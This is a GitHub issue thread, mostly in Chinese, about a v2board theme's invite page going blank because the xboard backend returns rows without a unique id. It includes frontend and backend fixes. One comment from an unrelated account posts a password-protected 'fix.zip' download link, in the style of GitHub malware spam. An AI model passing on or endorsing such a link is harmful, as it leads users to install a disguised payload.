### ISSUE TITLE
xboard 后台打开邀请页面会直接页面空白

### ISSUE THREAD

**Issue by hovans** [moeumwy/v2board-theme#1]
f12提示：
ncaught Error: MUI: The data grid component requires all rows to have a unique `id` property.
Alternatively, you can use the `getRowId` prop to specify a custom id for each row.
A row was provided without id in the rows prop:
{"user_id":687830,"code":"sCZHoxE2","pv":0,"status":0,"created_at":1720578201,"updated_at":1720578201}
    at Wu (DataGrid.962b3ad8aebe.chunk.js:1:136664)
    at kn (DataGrid.962b3ad8aebe.chunk.js:1:136921)
    at sn (DataGrid.962b3ad8aebe.chunk.js:1:137171)
    at DataGrid.962b3ad8aebe.chunk.js:1:191558
    at ZS (vendor.31f6b19010c3.chunk.js:33:96878)
    at ip (vendor.31f6b19010c3.chunk.js:33:115036)
    at _ve (vendor.31f6b19010c3.chunk.js:33:113858)
    at Pc (vendor.31f6b19010c3.chunk.js:33:112897)
    at o5 (vendor.31f6b19010c3.chunk.js:33:109500)
    at Zu (vendor.31f6b19010c3.chunk.js:33:47820)

可能是没返回唯一 id 导致的

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hovans** [comment]
看了下 ，应该改为inviteCodesTable.tsx 的 DataGrid 加上 getRowId = {(row)=>row.user_id} 就好了，后端是 xboard

**Comment by moeumwy** [comment]
> 看了下 ，应该改为inviteCodesTable.tsx 的 DataGrid 加上 getRowId = {(row)=>row.user_id} 就好了，后端是 xboard

xboard的后端API没有返回唯一ID所以报错显示空白页面，可以选择将后端/app/Http/Resources/InviteCodeResource.php中的返回data添加一个"id" => $this['id']即可。当然也可以选择其他实现方式。
